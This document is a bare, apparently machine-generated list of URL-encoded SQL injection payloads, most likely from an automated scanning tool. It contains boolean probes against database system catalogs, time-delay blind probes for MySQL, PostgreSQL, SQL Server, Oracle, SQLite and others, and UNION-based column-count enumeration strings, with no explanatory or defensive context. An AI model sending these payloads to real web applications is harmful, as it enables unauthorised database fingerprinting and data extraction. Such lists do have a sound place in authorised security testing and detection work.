-5677%25%27%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 -5760%00%27%29%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27Nxbz%27%3D%27Nxbz -7705%00%27%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27Njti%27%3D%27Njti -5416%27%29%20WHERE%209404%3D9404%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -4881%22%29%20WHERE%202891%3D2891%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -5570%29%20WHERE%207482%3D7482%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -2788%27%20WHERE%208445%3D8445%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -3990%22%20WHERE%202482%3D2482%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -1983%20WHERE%203633%3D3633%20OR%207744%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 -2227%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -7380%27%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -8667%27%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -2699%22%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -5564%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%287344%3D7344 -6707%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%284136%3D4136 -2228%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%289464%3D9464 -8300%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 -7126%27%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27lDwf%27%3D%27lDwf -7873%27%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27zwPl%27%3D%27zwPl -5077%27%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27lOEx%27%3D%27lOEx -2359%27%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27kMUa%27%3D%27kMUa -6534%27%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27ZmbR%27%20LIKE%20%27ZmbR -9625%27%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27qTuz%27%20LIKE%20%27qTuz -2492%27%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27VaLH%27%20LIKE%20%27VaLH -8695%27%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27ezSy%27%20LIKE%20%27ezSy -2029%22%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22jHey%22%3D%22jHey -5836%22%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22ziLc%22%3D%22ziLc -8448%22%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22yFpD%22%3D%22yFpD -7513%22%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22dEGh%22%3D%22dEGh -7189%22%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22GJaY%22%20LIKE%20%22GJaY -2257%22%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22FlDl%22%20LIKE%20%22FlDl -2691%22%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22mnGE%22%20LIKE%20%22mnGE -5367%22%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22ErMj%22%20LIKE%20%22ErMj -6219%25%27%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 -5124%25%27%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 -2612%25%27%29%29%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 -5592%25%27%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 -7418%00%27%29%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27OJem%27%3D%27OJem -3025%00%27%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27Vjgs%27%3D%27Vjgs -5869%27%29%20WHERE%206231%3D6231%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -2272%22%29%20WHERE%201592%3D1592%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -6574%29%20WHERE%203771%3D3771%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -2398%27%20WHERE%203298%3D3298%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -4579%22%20WHERE%201050%3D1050%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 -5615%20WHERE%208000%3D8000%20OR%207301%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 %28SELECT%20%28CASE%20WHEN%20%286198%3D6198%29%20THEN%20SLEEP%285%29%20ELSE%206198%2A%28SELECT%206198%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286133%3D6133%29%20THEN%20%28SELECT%20BENCHMARK%285000000%2CMD5%280x48526d4f%29%29%29%20ELSE%206133%2A%28SELECT%206133%20FROM%20mysql.db%29%20END%29%29 %286916%3D6916%29%2ASLEEP%285%29 MAKE_SET%286222%3D6222%2CSLEEP%285%29%29 ELT%288213%3D8213%2CSLEEP%285%29%29 %28SELECT%206726%20FROM%20PG_SLEEP%285%29%29 %28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 %28SELECT%20%28CASE%20WHEN%20%283929%3D3929%29%20THEN%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ELSE%203929%2A%28SELECT%203929%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287318%3D7318%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%207318%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286685%3D6685%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2881%29%7C%7CCHR%28112%29%7C%7CCHR%2872%29%7C%7CCHR%2867%29%2C5%29%20ELSE%206685%20END%29%20FROM%20DUAL%29 %28SELECT%20%28CASE%20WHEN%20%288454%3D8454%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20ELSE%208454%20END%29%20FROM%20DUAL%29 %28SELECT%20LIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%29 %28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29 %28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 %28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287065%3D7065%29%20THEN%20SLEEP%285%29%20ELSE%207065%2A%28SELECT%207065%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286105%3D6105%29%20THEN%20%28SELECT%20BENCHMARK%285000000%2CMD5%280x4c524b49%29%29%29%20ELSE%206105%2A%28SELECT%206105%20FROM%20mysql.db%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%281447%3D1447%29%20THEN%20%28SELECT%201447%20FROM%20PG_SLEEP%285%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%286934%3D6934%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287887%3D7887%29%20THEN%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ELSE%207887%2A%28SELECT%207887%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%287019%3D7019%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%207019%2A%28SELECT%207019%20FROM%20master..sysdatabases%29%20END%29%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%288225%3D8225%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28113%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%2C5%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%2C%28SELECT%20%28CASE%20WHEN%20%288775%3D8775%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 1234.5%29%20ORDER%20BY%201%23 1234.5%29%20ORDER%20BY%201667%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20ORDER%20BY%201%23 1234.5%27%29%20ORDER%20BY%207504%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20ORDER%20BY%201%23 1234.5%27%20ORDER%20BY%208690%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20ORDER%20BY%201%23 1234.5%22%20ORDER%20BY%206607%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20ORDER%20BY%201%23 1234.5%29%20ORDER%20BY%201457%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20ORDER%20BY%201%23 1234.5%29%29%20ORDER%20BY%208967%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20ORDER%20BY%201%23 1234.5%29%29%29%20ORDER%20BY%203897%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20ORDER%20BY%201%23 1234.5%20ORDER%20BY%204751%23 1234.5%20UNION%20ALL%20SELECT%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20ORDER%20BY%201%23 1234.5%27%29%20ORDER%20BY%205235%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20ORDER%20BY%201%23 1234.5%27%29%29%20ORDER%20BY%202869%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 